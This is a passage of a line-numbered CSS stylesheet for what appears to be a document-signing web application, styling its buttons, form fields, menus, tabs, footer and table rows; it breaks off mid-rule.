  2597.            text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  2598.            background-image: url(img/button_gradient.png);
  2599.            -moz-border-radius: 2px;
  2600.            -webkit-border-radius: 2px;
  2601.            border-radius: 2px;
  2602.            border: solid 1px #C6C6C6;
  2603.            font-size: 12px;
  2604.            font-weight: bold;
  2605.            min-height: 34px;
  2606.            background-color: #e2e2e2;
  2607.            color: #0D61AF;
  2608.        }
  2609.  
  2610.        .Btnprimary:hover {
  2611.            background-image: url(img/button_gradient_hover.png);
  2612.        }
  2613.  
  2614.        .Btnprimary:disabled {
  2615.            color: #bbbbbb;
  2616.        }
  2617.  
  2618.        .Btnsecondary {
  2619.            position: relative;
  2620.            cursor: pointer;
  2621.            text-decoration: none;
  2622.            white-space: nowrap;
  2623.            background-repeat: repeat-x;
  2624.            padding: 1px 15px;
  2625.            font-family: Helvetica, Arial, sans-serif !important;
  2626.            text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  2627.            background-image: url(img/button_gradient.png);
  2628.            -moz-border-radius: 2px;
  2629.            -webkit-border-radius: 2px;
  2630.            border-radius: 2px;
  2631.            border: solid 1px #C6C6C6;
  2632.            font-size: 12px;
  2633.            font-weight: bold;
  2634.            min-height: 34px;
  2635.            background-color: #e2e2e2;
  2636.            color: #666666;
  2637.        }
  2638.  
  2639.        .Btnsecondary:hover {
  2640.            background-image: url(img/button_gradient_hover.png);
  2641.        }
  2642.  
  2643.        .Btnsecondary:disabled {
  2644.            color: #bbbbbb;
  2645.        }
  2646.  
  2647.        .Btntransparent {
  2648.            background-color: transparent;
  2649.            border: solid 1px transparent;
  2650.            cursor: pointer;
  2651.            font-weight: normal;
  2652.            position: relative;
  2653.            text-decoration: none;
  2654.            padding: 1px;
  2655.            margin: 0px 10px;
  2656.            font-size: 12px;
  2657.            min-height: 36px;
  2658.            border: solid 0px transparent;
  2659.            color: #0D61AF;
  2660.        }
  2661.  
  2662.        .DiaHCSignDialog,
  2663.        .DiaHCSignDialogSmall {
  2664.            position: absolute;
  2665.            top: 20px;
  2666.            right: 16px;
  2667.            padding: 5px 5px 0px 0px;
  2668.        }
  2669.  
  2670.        .Btntransparent:hover {
  2671.            text-decoration: underline;
  2672.        }
  2673.  
  2674.        .Btntransparent:disabled {
  2675.            color: #A0A0A0;
  2676.        }
  2677.  
  2678.        .Modal {
  2679.            position: absolute;
  2680.            z-index: 12;
  2681.            top: 0px;
  2682.            height: 500px;
  2683.            -ms-filter: 'progid:DXImageTransform.Microsoft.Alpha(Opacity=60)';
  2684.            filter: Alpha(opacity=60);
  2685.            opacity: .6;
  2686.            background-color: transparent !important;
  2687.            background-color: #FFFFFF;
  2688.            background-image: url(img/masknew.png) !important;
  2689.            background-image: none;
  2690.            background-repeat: repeat;
  2691.            left: 0px;
  2692.            width: 100%;
  2693.        }
  2694.  
  2695.        .DiaHTSignDialog {
  2696.            padding: 30px 35px 4px;
  2697.        }
  2698.  
  2699.        .DashboardArea {
  2700.            background: #fff;
  2701.            border: solid 1px #ccc;
  2702.            padding: 10px;
  2703.            clear: both;
  2704.            margin-top: 20px;
  2705.        }
  2706.  
  2707.        .DashboardLinkBoldText {
  2708.            font-weight: bold;
  2709.            font-size: 12px;
  2710.            color: #069;
  2711.            cursor: pointer;
  2712.        }
  2713.  
  2714.        .DashboardDisabledText {
  2715.            font-weight: bold;
  2716.            color: #9A9A9A;
  2717.        }
  2718.  
  2719.        .DashboardLinkBoldText:hover {
  2720.            text-decoration: underline;
  2721.        }
  2722.  
  2723.        .DashboardLinkText {
  2724.            font-weight: normal;
  2725.            font-size: 12px;
  2726.            color: #069;
  2727.            cursor: pointer;
  2728.        }
  2729.  
  2730.        .DashboardLinkText:hover {
  2731.            text-decoration: underline;
  2732.        }
  2733.  
  2734.        .DashboardLink11BoldText {
  2735.            font-weight: bold;
  2736.            font-size: 11px;
  2737.            color: #069;
  2738.            cursor: pointer;
  2739.        }
  2740.  
  2741.        .DashboardLink11BoldText:hover {
  2742.            text-decoration: underline;
  2743.        }
  2744.  
  2745.        .DashboardIdName {
  2746.            font-weight: normal;
  2747.            font-size: 18px;
  2748.            color: #000000;
  2749.            font-family: Helvetica, Arial, sans-serif !important;
  2750.        }
  2751.  
  2752.        .FieldLbl {
  2753.            padding: 2px 5px 0px 13px !important;
  2754.        }
  2755.  
  2756.        .Field {
  2757.            color: #333333;
  2758.            margin: 5px;
  2759.            padding: 2px 9px;
  2760.            resize: none;
  2761.            background-color: #FAFAFA;
  2762.            -moz-border-radius: 2px;
  2763.            -webkit-border-radius: 2px;
  2764.            border-radius: 2px;
  2765.            border: solid 1px #CCC;
  2766.        }
  2767.  
  2768.        .Field:focus {
  2769.            outline: none;
  2770.            border: solid 1px #333333;
  2771.        }
  2772.  
  2773.        .Field:disabled {
  2774.            color: #bbbbbb;
  2775.            background-color: #efefef;
  2776.            border: solid 1px #cccccc;
  2777.        }
  2778.  
  2779.        select.Field {
  2780.            padding: 1px 2px 1px 2px !important;
  2781.            -moz-border-radius: 3px !important;
  2782.            -webkit-border-radius: 3px !important;
  2783.            border-radius: 3px !important;
  2784.        }
  2785.  
  2786.        .FieldMissing {
  2787.            color: #999999;
  2788.        }
  2789.  
  2790.        .FieldNotMissing {
  2791.            color: #333333;
  2792.        }
  2793.  
  2794.        .FieldRequired {
  2795.            color: #333333;
  2796.            margin: 5px;
  2797.            padding: 2px 9px;
  2798.            resize: none;
  2799.            background-color: #FAFAFA;
  2800.            -moz-border-radius: 2px;
  2801.            -webkit-border-radius: 2px;
  2802.            border-radius: 2px;
  2803.            border: solid 1px #CCC;
  2804.        }
  2805.  
  2806.        .FieldNoEdit {
  2807.            margin: 5px;
  2808.            padding: 2px 9px;
  2809.            resize: none;
  2810.            -moz-border-radius: 2px;
  2811.            -webkit-border-radius: 2px;
  2812.            border-radius: 2px;
  2813.            border: solid 1px #CCC;
  2814.            border: solid 1px #CCC;
  2815.            background-color: #ffffff;
  2816.        }
  2817.  
  2818.        .FieldNoEdit:disabled {
  2819.            color: #bbbbbb;
  2820.            background-color: #efefef;
  2821.            border: solid 1px #cccccc;
  2822.        }
  2823.  
  2824.        .FieldNoEdit:hover {
  2825.            color: #333333;
  2826.            margin: 5px;
  2827.            padding: 2px 9px;
  2828.            resize: none;
  2829.            background-color: #FAFAFA;
  2830.            -moz-border-radius: 2px;
  2831.            -webkit-border-radius: 2px;
  2832.            border-radius: 2px;
  2833.            border: solid 1px #CCC;
  2834.        }
  2835.  
  2836.        .SigningGroupEmailDisabled:hover {
  2837.            background-color: #efefef;
  2838.        }
  2839.  
  2840.        .LogoutLinks {
  2841.            position: absolute;
  2842.            top: 0px;
  2843.            right: 25px;
  2844.            z-index: 1000;
  2845.        }
  2846.  
  2847.        .TabsHolder {
  2848.            position: relative;
  2849.            z-index: 100;
  2850.            min-height: 51px;
  2851.            background-color: #1E4CA1;
  2852.            background-image: url(img/header_noisegradient.png);
  2853.            background-repeat: repeat-x;
  2854.        }
  2855.  
  2856.        .TabsPointer {
  2857.            position: absolute;
  2858.            z-index: 101;
  2859.            top: 42px;
  2860.        }
  2861.  
  2862.        .Border {
  2863.            position: relative;
  2864.            min-width: 1024px;
  2865.            border-bottom: solid 1px #cccccc;
  2866.        }
  2867.  
  2868.        .Header {
  2869.            position: relative;
  2870.            background-color: transparent;
  2871.            background-image: url(img/subheader_background.png);
  2872.            background-repeat: repeat-x;
  2873.            background-position: bottom;
  2874.            min-height: 69px;
  2875.        }
  2876.  
  2877.        .HeaderContent {
  2878.            position: relative;
  2879.            margin: 0px 10px 0px 10px;
  2880.            float: left;
  2881.        }
  2882.  
  2883.        .HeaderLink {
  2884.            color: #0D61AF;
  2885.            font-size: 12px;
  2886.        }
  2887.  
  2888.        .Logo {
  2889.            position: relative;
  2890.            float: left;
  2891.            vertical-align: middle;
  2892.        }
  2893.  
  2894.        .LogoFrameL {
  2895.            margin: 0px 0px 0px 40px;
  2896.        }
  2897.  
  2898.        .LogoFrameR {
  2899.            margin: 0px 40px 0px 0px;
  2900.        }
  2901.  
  2902.        .LogoLeft {
  2903.            margin: 0px;
  2904.            cursor: pointer;
  2905.            background-color: #ffffff;
  2906.            background-image: url(img/header_logo_gradient.png);
  2907.            background-repeat: repeat-x;
  2908.            padding: 5px 0px;
  2909.            height: 37px;
  2910.        }
  2911.  
  2912.        .LogoRight {
  2913.            position: relative;
  2914.            margin: 5px 10px 2px 10px;
  2915.            float: right;
  2916.        }
  2917.  
  2918.        .FormBody {
  2919.            min-height: 300px;
  2920.            position: relative;
  2921.            margin: 0px;
  2922.            clear: both;
  2923.        }
  2924.  
  2925.        .Footer {
  2926.            min-width: 944px;
  2927.            text-align: right;
  2928.            padding: 0 40px;
  2929.        }
  2930.  
  2931.        .FooterLogin {
  2932.            position: absolute;
  2933.            padding: 0px;
  2934.            display: block;
  2935.        }
  2936.  
  2937.        .FooterImage {
  2938.            position: relative;
  2939.            float: left;
  2940.            margin-right: 20px;
  2941.        }
  2942.  
  2943.        .DiaHSignDialogSmall {
  2944.            overflow: visible;
  2945.        }
  2946.  
  2947.        #divLanguageSelected {
  2948.            *display: inline;
  2949.        }
  2950.  
  2951.        .FooterLinks {
  2952.            color: #999;
  2953.            display: inline-block;
  2954.            *display: inline;
  2955.            overflow: visible;
  2956.            position: relative;
  2957.        }
  2958.  
  2959.        .FooterLink {
  2960.            padding-top: 4px;
  2961.            display: inline-block;
  2962.            color: #999;
  2963.            font-size: 12px;
  2964.            cursor: pointer;
  2965.        }
  2966.  
  2967.        .FooterLink:hover {
  2968.            text-decoration: underline;
  2969.        }
  2970.  
  2971.        .FooterLink.set-mobile {
  2972.            padding-right: 15px;
  2973.        }
  2974.  
  2975.        .FooterMenuClosed {
  2976.            color: #999;
  2977.            display: none;
  2978.            z-index: 1000;
  2979.            cursor: pointer;
  2980.            min-width: 100px;
  2981.        }
  2982.  
  2983.        .FooterMenuClosed:hover {
  2984.            display: block;
  2985.            left: 0px;
  2986.            top: 0px;
  2987.            z-index: 1000;
  2988.            cursor: pointer;
  2989.            min-width: 100px;
  2990.            border: solid 1px #DEDEDE;
  2991.            -moz-border-radius: 10px;
  2992.            -webkit-border-radius: 10px;
  2993.            border-radius: 10px;
  2994.        }
  2995.  
  2996.        .SctClr {
  2997.            position: relative;
  2998.            clear: both;
  2999.            height: 1px;
  3000.            font-size: 1px;
  3001.        }
  3002.  
  3003.        .DefaultLinkBlue {
  3004.            color: #0D61AF;
  3005.        }
  3006.  
  3007.        .DefaultLinkDark {
  3008.            color: #000000;
  3009.        }
  3010.  
  3011.        .DefaultLinkLight {
  3012.            color: #FFFFFF;
  3013.        }
  3014.  
  3015.        .DefaultLink12 {
  3016.            font-size: 12px;
  3017.        }
  3018.  
  3019.        .DefaultLink,
  3020.        .DefaultLink:visited {
  3021.            text-decoration: none;
  3022.            cursor: pointer;
  3023.        }
  3024.  
  3025.        .DefaultLink:hover {
  3026.            text-decoration: underline;
  3027.            cursor: pointer;
  3028.        }
  3029.  
  3030.        .ToolSp {
  3031.            position: relative;
  3032.            height: 2px;
  3033.            font-size: 2px;
  3034.            background-image: url(img/options_spacer.png);
  3035.            background-repeat: repeat-x;
  3036.            margin-top: 3px;
  3037.            margin-bottom: 3px;
  3038.        }
  3039.  
  3040.        .ToolSpSmall {
  3041.            position: relative;
  3042.            height: 2px;
  3043.            font-size: 2px;
  3044.            background-image: url(img/options_spacer.png);
  3045.            background-repeat: repeat-x;
  3046.            margin-top: 1px;
  3047.        }
  3048.  
  3049.        .SearchTxtImg {
  3050.            position: absolute;
  3051.            right: 0px;
  3052.            cursor: pointer;
  3053.            vertical-align: middle;
  3054.            background-repeat: no-repeat;
  3055.            top: 0px;
  3056.            height: 32px;
  3057.            width: 32px;
  3058.            background-color: #e2e2e2;
  3059.            background-image: url(img/search_new_dark.png);
  3060.            -moz-border-radius: 0px 2px 2px 0px;
  3061.            -webkit-border-radius: 0px 2px 2px 0px;
  3062.            border-radius: 0px 2px 2px 0px;
  3063.            border: solid 1px #C6C6C6;
  3064.        }
  3065.  
  3066.        .SearchTxtImg:hover {
  3067.            background-image: url(img/search_new_dark_hover.png);
  3068.        }
  3069.  
  3070.        .SearchField {
  3071.            padding: 2px 30px 2px 7px !important;
  3072.            height: 28px;
  3073.            width: 200px;
  3074.            margin-top: 0px;
  3075.            border: solid 1px #C6C6C6 !important;
  3076.        }
  3077.  
  3078.        .DIA {
  3079.            position: absolute;
  3080.            z-index: 500;
  3081.            min-width: 385px;
  3082.        }
  3083.  
  3084.        .DIASCREEN {
  3085.            position: fixed !important;
  3086.            z-index: 500;
  3087.        }
  3088.  
  3089.        .DIAFLOW {
  3090.            position: relative;
  3091.            margin: 0px 10px;
  3092.            width: 1015px;
  3093.        }
  3094.  
  3095.        .DIAFLOWLEFTONLY {
  3096.            position: relative;
  3097.            margin: 0px 10px;
  3098.            width: 242px;
  3099.        }
  3100.  
  3101.        .Correcting {
  3102.            position: relative;
  3103.            margin: 0px 10px;
  3104.            width: 1015px;
  3105.            font-size: 20px;
  3106.            padding: 6px;
  3107.        }
  3108.  
  3109.        .ErrorMessageText {
  3110.            font-weight: bold;
  3111.            font-size: 11px;
  3112.            color: #DC143C;
  3113.        }
  3114.  
  3115.        .ContentTextBoldBlue {
  3116.            font-weight: bold;
  3117.            font-size: 12px;
  3118.            color: #0073cf;
  3119.        }
  3120.  
  3121.        .ContentTextBlue {
  3122.            font-weight: normal;
  3123.            font-size: 12px;
  3124.            color: #0073cf;
  3125.        }
  3126.  
  3127.        .Page {
  3128.            margin: 30px 0px 0px 55px;
  3129.            position: relative;
  3130.            background-color: #646464;
  3131.            clear: both;
  3132.            border: solid 1px #c4c4c4;
  3133.            ;
  3134.            -moz-box-shadow: 2px 2px 8px #646464;
  3135.            -webkit-box-shadow: 2px 2px 8px #646464;
  3136.            box-shadow: 2px 2px 8px #646464;
  3137.        }
  3138.  
  3139.        .PageIdentifier {
  3140.            margin: 0px 0px 0px 55px;
  3141.            position: relative;
  3142.            background-color: transparent;
  3143.            padding-top: 6px;
  3144.        }
  3145.  
  3146.        .CurrentFilter {
  3147.            font-size: 12px;
  3148.        }
  3149.  
  3150.        .BorderRoundGray {
  3151.            padding: 5px;
  3152.            -moz-border-radius: 5px;
  3153.            -webkit-border-radius: 5px;
  3154.            border-radius: 5px;
  3155.            border: solid 1px #CFCFCF;
  3156.        }
  3157.  
  3158.        .histEntityTitle {
  3159.            color: #999999;
  3160.            font-size: 14px;
  3161.        }
  3162.  
  3163.        .histEntityContent {
  3164.            color: #333333;
  3165.            font-size: 14px;
  3166.        }
  3167.  
  3168.        .historyDataRow {
  3169.            margin-bottom: 4px;
  3170.            font-size: 14px;
  3171.            color: #333333;
  3172.            border-bottom: solid 1px #e8e8e8;
  3173.            float: left;
  3174.            width: 100%;
  3175.        }
  3176.  
  3177.        .timeColumn {
  3178.            display: inline-block;
  3179.            vertical-align: top;
  3180.            width: 14%;
  3181.            margin-right: 10px;
  3182.            float: left;
  3183.        }
  3184.  
  3185.        .userColumn {
  3186.            display: inline-block;
  3187.            vertical-align: top;
  3188.            width: 20%;
  3189.            margin-right: 10px;
  3190.            float: left;
  3191.        }
  3192.  
  3193.        .actionColumn {
  3194.            display: inline-block;
  3195.            vertical-align: top;
  3196.            width: 12%;
  3197.            margin-right: 10px;
  3198.            float: left;
  3199.        }
  3200.  
  3201.        .activityColumn {
  3202.            display: inline-block;
  3203.            vertical-align: top;
  3204.            width: 37%;
  3205.            margin-right: 10px;
  3206.            float: left;
  3207.        }
  3208.  
  3209.        .statusColumn {
  3210.            display: inline-block;
  3211.            vertical-align: top;
  3212.            width: 8%;
  3213.        }
  3214.  
  3215.        .TabCommon {
  3216.            cursor: pointer;
  3217.            float: left;
  3218.            position: relative;
  3219.            font-size: 14px;
  3220.            text-align: center;
  3221.            margin-left: 0px;
  3222.            padding-left: 5px;
  3223.            padding-right: 5px;
  3224.            border-left: solid 1px #143169;
  3225.            border-right: 1px solid transparent;
  3226.            bottom: 0px;
  3227.            color: #FFFFFF;
  3228.        }
  3229.  
  3230.        .TabSmall {
  3231.            font-weight: bold;
  3232.            border: 1px solid #C6C6C6 !important;
  3233.            font-size: 12px;
  3234.            min-width: 70px !important;
  3235.            min-height: 24px !important;
  3236.            padding-top: 9px;
  3237.            background-image: url(img/button_gradient.png);
  3238.            background-repeat: repeat-x;
  3239.            background-color: #e2e2e2;
  3240.            color: #666666;
  3241.        }
  3242.  
  3243.        .TabSelSmall {
  3244.            font-weight: bold;
  3245.            border: none !important;
  3246.            font-size: 12px;
  3247.            min-width: 72px !important;
  3248.            min-height: 25px !important;
  3249.            padding-top: 10px;
  3250.            background-color: #1E4CA1;
  3251.            color: #FFFFFF;
  3252.        }
  3253.  
  3254.        .TabBig {
  3255.            font-size: 13px;
  3256.            font-weight: bold;
  3257.            height: 29px !important;
  3258.            min-width: 100px !important;
  3259.            padding-top: 16px;
  3260.        }
  3261.  
  3262.        .TabSelBig {
  3263.            font-size: 13px;
  3264.            font-weight: bold;
  3265.            border-right: 1px solid transparent;
  3266.            border-bottom: solid 1px #143169;
  3267.            background-color: #143169;
  3268.            height: 29px !important;
  3269.            min-width: 100px !important;
  3270.            padding-top: 16px;
  3271.        }
  3272.  
  3273.        .TabOuter {
  3274.            border-right: solid 1px #143169;
  3275.            float: left;
  3276.            position: relative;
  3277.        }
  3278.  
  3279.        .TabOuterSmall {
  3280.            float: left;
  3281.            position: relative;
  3282.            -moz-border-radius: 2px;
  3283.            -webkit-border-radius: 2px;
  3284.            border-radius: 2px;
  3285.        }
  3286.  
  3287.        .TabSpace {
  3288.            float: left;
  3289.            height: 10px;
  3290.            position: relative;
  3291.            width: 280px;
  3292.        }
  3293.  
  3294.        .HeaderTextStyle {
  3295.            font-size: 13px;
  3296.            font-weight: bold;
  3297.            font-size: 13px;
  3298.            font-weight: bold;
  3299.            color: #FFFFFF;
  3300.        }
  3301.  
  3302.        .HeaderBackground {
  3303.            background-color: #1E4CA1;
  3304.        }
  3305.  
  3306.        .ActionsMenu {
  3307.            display: block;
  3308.            z-index: 1000;
  3309.            cursor: pointer;
  3310.            min-width: 100px;
  3311.            background-color: #FAFAFA;
  3312.            border: solid 1px #A4A4A4;
  3313.            -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3314.            -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3315.            box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3316.            -moz-border-radius: 2px;
  3317.            -webkit-border-radius: 2px;
  3318.            border-radius: 2px;
  3319.            color: #333333;
  3320.        }
  3321.  
  3322.        .ActionsMenuManage {
  3323.            display: block;
  3324.            z-index: 1000;
  3325.            cursor: pointer;
  3326.            position: absolute;
  3327.            min-width: 150px;
  3328.            -moz-border-radius: 0px 0px 2px 2px;
  3329.            -webkit-border-radius: 0px 0px 2px 2px;
  3330.            border-radius: 0px 0px 2px 2px;
  3331.            -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3332.            -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3333.            box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3334.            background-color: #fff;
  3335.            border: solid 1px #ccc;
  3336.            -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3337.            -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3338.            box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3339.        }
  3340.  
  3341.        .ActionsMenuClosed {
  3342.            display: block;
  3343.            left: 0px;
  3344.            top: 0px;
  3345.            z-index: 1000;
  3346.            cursor: pointer;
  3347.            min-width: 100px;
  3348.            border: solid 1px transparent;
  3349.        }
  3350.  
  3351.        .ActionsMenuClosedNoHover {
  3352.            display: block;
  3353.            left: 0px;
  3354.            top: 0px;
  3355.            z-index: 1000;
  3356.            cursor: default;
  3357.            min-width: 100px;
  3358.            border: solid 1px transparent;
  3359.        }
  3360.  
  3361.        .ActionsMenuDisabled {
  3362.            color: #bbbbbb;
  3363.        }
  3364.  
  3365.        .ActionsMenuClosed:hover {
  3366.            display: block;
  3367.            left: 0px;
  3368.            top: 0px;
  3369.            z-index: 1000;
  3370.            cursor: pointer;
  3371.            min-width: 100px;
  3372.            background-color: #FAFAFA;
  3373.            border: solid 1px #A4A4A4;
  3374.            -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3375.            -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3376.            box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3377.            -moz-border-radius: 2px;
  3378.            -webkit-border-radius: 2px;
  3379.            border-radius: 2px;
  3380.        }
  3381.  
  3382.        .ActionMenuShowDown {
  3383.            left: 0px;
  3384.            top: 0px;
  3385.        }
  3386.  
  3387.        .ActionMenuShowDownNew {
  3388.            left: 0px;
  3389.            top: 0px;
  3390.            float: right;
  3391.            border: solid 1px transparent;
  3392.            background-color: #143169;
  3393.        }
  3394.  
  3395.        .ActionMenuShowUp {
  3396.            left: 0;
  3397.            bottom: 20px;
  3398.            position: absolute;
  3399.        }
  3400.  
  3401.        .ActionMenuItemTop {
  3402.            display: block;
  3403.            clear: both;
  3404.            padding-top: 5px;
  3405.            padding-left: 10px;
  3406.            white-space: nowrap;
  3407.            height: 24px;
  3408.            -moz-border-radius: 2px 2px 0px 0px;
  3409.            -webkit-border-radius: 2px 2px 0px 0px;
  3410.            border-radius: 2px 2px 0px 0px;
  3411.        }
  3412.  
  3413.        .ActionMenuItemTopSmall {
  3414.            display: block;
  3415.            clear: both;
  3416.            white-space: nowrap;
  3417.            height: 5px;
  3418.            -moz-border-radius: 2px 2px 0px 0px;
  3419.            -webkit-border-radius: 2px 2px 0px 0px;
  3420.            border-radius: 2px 2px 0px 0px;
  3421.        }
  3422.  
  3423.        .ActionMenuItemBottom {
  3424.            display: block;
  3425.            clear: both;
  3426.            border-top: solid 0px #999999;
  3427.            padding-top: 0px;
  3428.            padding-right: 0px;
  3429.            padding-left: 0px;
  3430.            white-space: nowrap;
  3431.            height: 5px;
  3432.            -moz-border-radius: 0px 0px 2px 2px;
  3433.            -webkit-border-radius: 0px 0px 2px 2px;
  3434.            border-radius: 0px 0px 2px 2px;
  3435.        }
  3436.  
  3437.        .ActionMenuItem {
  3438.            display: block;
  3439.            clear: both;
  3440.            padding-top: 6px;
  3441.            padding-bottom: 6px;
  3442.            padding-right: 10px;
  3443.            padding-left: 10px;
  3444.            white-space: nowrap;
  3445.        }
  3446.  
  3447.        .ActionMenuItemHover,
  3448.        .ActionMenuItem:hover {
  3449.            display: block;
  3450.            clear: both;
  3451.            padding-top: 6px;
  3452.            padding-bottom: 6px;
  3453.            padding-right: 10px;
  3454.            padding-left: 10px;
  3455.            white-space: nowrap;
  3456.            background-color: #e4e4e4;
  3457.        }
  3458.  
  3459.        .ActionMenuFltLeft {
  3460.            position: relative;
  3461.            float: left;
  3462.            margin: 5px 0px 5px 0px;
  3463.            vertical-align: top;
  3464.        }
  3465.  
  3466.        .ActionMenuFltLeftSpace {
  3467.            height: 1px;
  3468.            font-size: 1px;
  3469.            z-index: 19;
  3470.        }
  3471.  
  3472.        .ActionMenuItemFltTop {
  3473.            position: relative;
  3474.            padding: 2px;
  3475.            padding-left: 5px;
  3476.            white-space: nowrap;
  3477.            -webkit-border-radius: 5px 5px 0px 0px;
  3478.            -moz-border-radius: 5px 5px 0px 0px;
  3479.            border-radius: 5px 5px 0px 0px;
  3480.        }
  3481.  
  3482.        .ActionMenuItemImg {
  3483.            position: relative;
  3484.            vertical-align: middle;
  3485.            margin: 0px 5px 0px 5px;
  3486.            border: none;
  3487.        }
  3488.  
  3489.        .TightMenuItem {
  3490.            display: block;
  3491.            clear: both;
  3492.            padding: 0px 0px 0px 0px;
  3493.            white-space: nowrap;
  3494.            height: 24px;
  3495.        }
  3496.  
  3497.        .AccountMenuNew {
  3498.            background-color: #fff;
  3499.            border: solid 1px #ccc;
  3500.            background-color: #FFFFFF;
  3501.            position: absolute;
  3502.            right: 10px;
  3503.            top: 50px;
  3504.            -moz-border-radius: 2px;
  3505.            -webkit-border-radius: 2px;
  3506.            border-radius: 2px;
  3507.            -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3508.            -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3509.            box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  3510.        }
  3511.  
  3512.        #ds_divUserAccountsMenuNew:hover {
  3513.            border: solid 1px transparent;
  3514.            background-color: #143169;
  3515.        }
  3516.  
  3517.        .AccountOpenMenuNew {
  3518.            padding-left: 10px;
  3519.            padding-right: 10px;
  3520.            white-space: nowrap;
  3521.            width: 80px;
  3522.            min-width: 80px;
  3523.            height: 40px;
  3524.            padding-top: 5px;
  3525.            border-left: solid 1px #143169;
  3526.            border-right: solid 1px #143169;
  3527.        }
  3528.  
  3529.        .AccountSelected {
  3530.            height: 29px;
  3531.            text-align: right;
  3532.            padding-top: 9px;
  3533.            margin-right: 20px;
  3534.            float: left;
  3535.            font-size: 11px;
  3536.            color: #FFFFFF;
  3537.        }
  3538.  
  3539.        .UpdateAccount {
  3540.            float: left;
  3541.            margin-right: 10px;
  3542.            padding-top: 9px;
  3543.            font-size: 11px;
  3544.            color: #FFFFFF;
  3545.        }
  3546.  
  3547.  
  3548.        .RowHeaderCell {
  3549.            border-right: solid 1px transparent;
  3550.            border-left: solid 1px transparent;
  3551.            border-bottom: solid 1px #ccc;
  3552.            background-color: #fff;
  3553.            height: 23px;
  3554.            vertical-align: middle;
  3555.            border-top: none;
  3556.            white-space: nowrap;
  3557.            padding-left: 4px;
  3558.            padding-right: 4px;
  3559.            cursor: pointer;
  3560.        }
  3561.  
  3562.        .RowHeaderCell:hover {
  3563.            text-decoration: underline;
  3564.        }
  3565.  
  3566.        .RowHeaderCellNoClick {
  3567.            border-right: solid 1px transparent;
  3568.            border-left: solid 1px transparent;
  3569.            border-bottom: solid 1px #ccc;
  3570.            background-color: #fff;
  3571.            height: 23px;
  3572.            vertical-align: middle;
  3573.            border-top: none;
  3574.            white-space: nowrap;
  3575.            padding-left: 4px;
  3576.            padding-right: 4px;
  3577.        }
  3578.  
  3579.        .RowHeaderSectionBorder {
  3580.            border-right: solid 1px #FFFFFF;
  3581.            border-left: solid 1px #FFFFFF;
  3582.            border-top: solid 1px #DFDFDF;
  3583.            border-bottom: solid 1px #DFDFDF;
  3584.        }
  3585.  
  3586.        .RowHeaderSorted {
  3587.            background-image: url(img/row_col_sorted.png) !important;
  3588.            background-position: bottom !important;
  3589.        }
  3590.  
  3591.        .RowHeaderCellAlignCenter {
  3592.            text-align: center;
  3593.        }
  3594.  
  3595.        .RowHeaderCellLeft {
  3596.            border-left: solid 0px #CCCCCC;
  3597.        }
  3598.  
  3599.        .RowHeaderCellRight {
  3600.            border-right: solid 0px #CCCCCC;
  3601.        }
  3602.  
  3603.        .RowHeaderLink,
  3604.        .RowHeaderLink:hover,
  3605.        .RowHeaderLink:visited {
  3606.            color: #0073cf;
  3607.            text-decoration: none;
  3608.            cursor: pointer;
  3609.        }
  3610.  
  3611.        .RowHeaderLinkDisabled {
  3612.            color: #dedede;
  3613.            text-decoration: none;
  3614.            cursor: default;
  3615.        }
  3616.  
  3617.        .RowNoHover {
  3618.            border-left: solid 0px #cccccc;
  3619.            border-right: solid 0px #cccccc;
  3620.            border-top: solid 1px #cccccc;
  3621.            border-bottom: solid 1px #cccccc;
  3622.            background-color: #ffffff;
  3623.            height: 25px;
  3624.            cursor: default;
  3625.        }
  3626.  
  3627.        .RowAltNoHover {
  3628.            border-left: solid 0px #cccccc;
  3629.            border-right: solid 0px #cccccc;
  3630.            border-top: solid 1px #cccccc;
  3631.            border-bottom: solid 1px #cccccc;
  3632.            background-color: #ffffff;
  3633.            height: 25px;
  3634.            cursor: default;
  3635.        }
  3636.  
  3637.        .RowCellSubHead {
  3638.            border-left: solid 0px #cccccc;
  3639.            border-right: solid 0px #cccccc;
  3640.            border-top: solid 2px #cccccc;
  3641.            border-bottom: solid 1px #cccccc;
  3642.            padding: 3px 4px;
  3643.        }
  3644.  
  3645.        .Row {
  3646.            border-left: solid 0px #cccccc;
  3647.            border-right: solid 0px #cccccc;
  3648.            border-top: solid 1px #cccccc;
  3649.            border-bottom: solid 1px #cccccc;
  3650.            cursor: pointer;
  3651.        }
  3652.  
  3653.        .RowAlt {
  3654.            border-left: solid 0px #cccccc;
  3655.            border-right: solid 0px #cccccc;
  3656.            border-top: solid 1px #cccccc;
  3657.            border-bottom: solid 1px #cccccc;
  3658.            cursor: pointer;
  3659.        }
  3660.  
  3661.        .Row:hover,
  3662.        .RowAlt:hover {
  3663.            background-color: #f4f4f4;
  3664.        }
  3665.  
  3666.        .RowSel,
  3667.        .RowAltSel {
  3668.            border-left: solid 0px #cccccc;
  3669.            border-right: solid 0px #cccccc;
  3670.            border-top: solid 1px #cccccc;
  3671.            border-bottom: solid 1px #cccccc;
  3672.            background-color: #e4e4e4;
  3673.            cursor: pointer;
  3674.        }
  3675.  
  3676.        .RowCell {
  3677.            border-left: none;
  3678.            border-right: solid 1px transparent;
  3679.            border-top: solid 1px #cccccc;
  3680.            border-bottom: solid 1px #cccccc;
  3681.            padding: 3px 0px 3px 4px;
  3682.        }
  3683.  
  3684.        .RowBulkCell {
  3685.            border-left: none;
  3686.            border-right: none;
  3687.            border-bottom: solid 1px #cccccc;
  3688.            vertical-align: top;
